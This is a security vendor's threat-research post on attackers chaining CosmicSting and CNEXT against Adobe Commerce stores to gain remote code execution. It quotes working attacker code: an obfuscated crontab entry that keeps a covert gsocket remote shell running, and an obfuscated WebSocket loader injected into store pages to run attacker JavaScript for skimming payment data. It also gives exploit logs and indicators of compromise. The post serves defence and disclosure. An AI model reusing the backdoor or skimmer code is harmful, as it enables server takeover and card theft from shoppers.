Persistent backdoors injected on Adobe Commerce via new CosmicSting attack
by Sansec Forensics Team
Published in Threat Research − August 27, 2024
In our previous posts, we discussed how threat actors were abusing CosmicSting by injecting malicious scripts into CMS blocks. While these attacks continue, we've observed a significant escalation - attackers are now chaining CosmicSting with CNEXT to achieve remote code execution (RCE). We warned of this more sophisticated vector in our initial article and are now seeing active exploitation in the wild.
CosmicSting (CVE-2024-34102) allows arbitrary file reading on unpatched systems. When combined with CNEXT (CVE-2024-2961), threat actors can escalate to remote code execution, taking over the entire system. Merchants must patch their systems against both vulnerabilities immediately. Refer to Adobe's troubleshooting guide to mitigate the issue in Adobe Commerce/Magento. We offer a standalone tool for detecting CNEXT.
Exploitation
Logs reveal attempts to exploit this vulnerability:
193.93.193.74, ::1 - - [09/Aug/2024:00:24:42 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:24:45 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:25:18 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 504 247 "-" "python-requests/2.32.3"
Notably, the attackers haven't even bothered to change the default test-ambio cart ID from the original Ambionics exploit.
It's important to note that despite the 4xx and 5xx status codes, successful exploitation can still occur.
Backdoor and Persistence
Once the attackers gain a foothold, they first drop two malicious files in ~/.config/htop named defunct and defunct.dat.
Afterwards, the following entry is added to the system's crontab:
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvdmhvc3RzLzxTTklQPi8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1tyYWlkNXdxXScgJy92YXIvd3d3L3Zob3N0cy88U05JUD4vLmNvbmZpZy9odG9wL2RlZnVuY3QnIiAyPi9kZXYvbnVsbAo|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
This crontab entry, which runs hourly, decodes to:
/usr/bin/pkill -0 -U1004 defunct 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /var/www/vhosts/<SNIP>/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[raid5wq]' '/var/www/vhosts/<SNIP>/.config/htop/defunct'" 2>/dev/null
This script ensures the defunct process is always running, masquerading as a kernel thread named [raid5wq]. Observed process names include [kswapd0], [slub_flushwq], [card0-crtc8], [netns] and others.
The binary file dropped in ~/.config/htop/defunct is identified as gsocket. The Global Socket Toolkit facilitates peer-to-peer TCP connections, even through NAT/Firewalls, using end-to-end encryption and a relay network. Its TOR support makes it particularly attractive for malicious actors seeking anonymity.
Several options are passed to gsocket:
- The
~/.config/htop/defunct.datfile contains the secret used to establish a secure connection and is passed as-k. - The remaining options
-liqDensure that a quiet interactive server shell is spawned in daemon mode.
This allows the attackers to maintain persistent, covert access to the compromised system.
Websocket Injection
Like all Magecart attacks, these are financially motivated. We've observed the following scripts being added to the store's header:
const xcmw = [93,89,89,16,5,5,89,79,70,70,79,88,89,94,75,94,4,89,67,94,79,5,93,89,89,21,89,69,95,88,73,79,23];
const tpkd = 42;
window.ww = new WebSocket(String.fromCharCode(...xcmw.map(hnax => hnax ^ tpkd)) + encodeURIComponent(location.href));
window.ww.addEventListener('message', event => {new Function(event.data)()});
This script establishes a WebSocket connection to wss://sellerstat.site/wss and executes any JavaScript received from the attacker. The domains and payloads delivered via the websocket differ between affected stores but always aims to steal customer payment data through various injection techniques. By leveraging this real-time communication channel, attackers can dynamically adapt their payloads, making detection and mitigation significantly more challenging.
Indicators of Compromise
wss://accept.bar/common
wss://amocha.xyz/common
wss://cdn-webstats.com/ls
wss://clearnetfab.net/common
wss://fallodick87-78.sbs/common
wss://cd.iconstaff.top/m
wss://cdn.iconstaff.top/common
wss://cdn.inspectdlet.net/ws
wss://jqueryuslibs.com/common
wss://jstatic201.com/common
wss://lererikal.org/common
wss://mamatmavali.ru/common
wss://nothingillegal.bond/common
wss://paie-locli.com/s
wss://sellerstat.site/wss
wss://statsseo.com/common
wss://statstoday.org/common
wss://vincaolet.xyz/socket
wss://webexcelsior.org/common
5jb25maWcvaHRvcC9kZWZ1bmN0
uY29uZmlnL2h0b3AvZGVmdW5jd
LmNvbmZpZy9odG9wL2RlZnVuY3
165.231.182.98
45.10.160.45
193.93.193.74
Read more
In this article
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
